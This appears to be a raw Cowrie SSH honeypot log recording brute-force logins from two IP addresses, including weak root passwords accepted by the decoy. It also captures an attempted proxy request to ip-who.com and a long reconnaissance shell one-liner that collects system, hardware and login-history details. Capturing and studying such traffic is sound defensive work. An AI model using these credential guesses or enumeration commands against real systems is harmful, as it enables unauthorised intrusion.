{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:58:48.121677Z","src_ip":"212.227.235.229","session":"8db4245810d4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-31T04:58:48.498748Z","src_ip":"212.227.235.229","session":"30548305ef70"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:58:48.499962Z","src_ip":"212.227.235.229","session":"30548305ef70"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:58:48.501504Z","src_ip":"212.227.235.229","session":"30548305ef70"}
{"eventid":"cowrie.login.failed","username":"arpan","password":"arpan","message":"login attempt [arpan/arpan] failed","sensor":"my-vps","timestamp":"2025-08-31T04:58:49.118007Z","src_ip":"212.227.235.229","session":"8db4245810d4"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:58:50.369234Z","src_ip":"212.227.235.229","session":"8db4245810d4"}
{"eventid":"cowrie.session.closed","duration":"92.5","message":"Connection lost after 92.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:58:51.870054Z","src_ip":"212.227.235.229","session":"f34f52c6b0ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46382,"dst_ip":"1.2.3.4","dst_port":22,"session":"220d13243871","protocol":"ssh","message":"New connection: 212.227.235.229:46382 (1.2.3.4:22) [session: 220d13243871]","sensor":"my-vps","timestamp":"2025-08-31T04:58:52.225242Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:58:52.392830Z","src_ip":"212.227.235.229","session":"220d13243871"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:58:52.526159Z","src_ip":"212.227.235.229","session":"220d13243871"}
{"eventid":"cowrie.login.success","username":"root","password":"bananapi","message":"login attempt [root/bananapi] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:58:54.492580Z","src_ip":"212.227.235.229","session":"220d13243871"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-31T04:58:54.773219Z","session":"220d13243871"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T04:58:55.033025Z","src_ip":"212.227.235.229","session":"220d13243871"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:58:55.300803Z","src_ip":"212.227.235.229","session":"220d13243871"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39458,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c660a9cf4a4","protocol":"ssh","message":"New connection: 212.227.235.229:39458 (1.2.3.4:22) [session: 5c660a9cf4a4]","sensor":"my-vps","timestamp":"2025-08-31T04:58:56.293599Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:58:56.294942Z","src_ip":"212.227.235.229","session":"5c660a9cf4a4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:58:56.415857Z","src_ip":"212.227.235.229","session":"5c660a9cf4a4"}
{"eventid":"cowrie.login.failed","username":"moodle","password":"123!@#","message":"login attempt [moodle/123!@#] failed","sensor":"my-vps","timestamp":"2025-08-31T04:58:56.942532Z","src_ip":"212.227.235.229","session":"5c660a9cf4a4"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:58:58.065054Z","src_ip":"212.227.235.229","session":"5c660a9cf4a4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43520,"dst_ip":"1.2.3.4","dst_port":22,"session":"4fff232e4934","protocol":"ssh","message":"New connection: 212.227.235.229:43520 (1.2.3.4:22) [session: 4fff232e4934]","sensor":"my-vps","timestamp":"2025-08-31T04:58:59.236929Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:58:59.273628Z","src_ip":"212.227.235.229","session":"4fff232e4934"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:58:59.593657Z","src_ip":"212.227.235.229","session":"4fff232e4934"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43294,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5fa48d6b2ca","protocol":"ssh","message":"New connection: 212.227.125.160:43294 (1.2.3.4:22) [session: e5fa48d6b2ca]","sensor":"my-vps","timestamp":"2025-08-31T04:59:01.679367Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:59:02.228656Z","src_ip":"212.227.125.160","session":"e5fa48d6b2ca"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:59:02.229559Z","src_ip":"212.227.125.160","session":"e5fa48d6b2ca"}
{"eventid":"cowrie.login.failed","username":"geral","password":"geral","message":"login attempt [geral/geral] failed","sensor":"my-vps","timestamp":"2025-08-31T04:59:02.286300Z","src_ip":"212.227.235.229","session":"4fff232e4934"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:59:03.647190Z","src_ip":"212.227.235.229","session":"4fff232e4934"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35070,"dst_ip":"1.2.3.4","dst_port":22,"session":"0224d98a3c1e","protocol":"ssh","message":"New connection: 212.227.235.229:35070 (1.2.3.4:22) [session: 0224d98a3c1e]","sensor":"my-vps","timestamp":"2025-08-31T04:59:04.836281Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:59:04.869089Z","src_ip":"212.227.235.229","session":"0224d98a3c1e"}
{"eventid":"cowrie.login.success","username":"root","password":"admin123","message":"login attempt [root/admin123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:59:05.008203Z","src_ip":"212.227.125.160","session":"e5fa48d6b2ca"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:59:05.084894Z","src_ip":"212.227.235.229","session":"0224d98a3c1e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:59:06.213525Z","src_ip":"212.227.125.160","session":"e5fa48d6b2ca"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-31T04:59:06.214464Z","src_ip":"212.227.125.160","session":"e5fa48d6b2ca"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T04:59:06.215631Z","src_ip":"212.227.125.160","session":"e5fa48d6b2ca"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T04:59:06.216886Z","src_ip":"212.227.125.160","session":"e5fa48d6b2ca"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-31T04:59:06.218977Z","src_ip":"212.227.125.160","session":"e5fa48d6b2ca"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T04:59:06.220171Z","src_ip":"212.227.125.160","session":"e5fa48d6b2ca"}
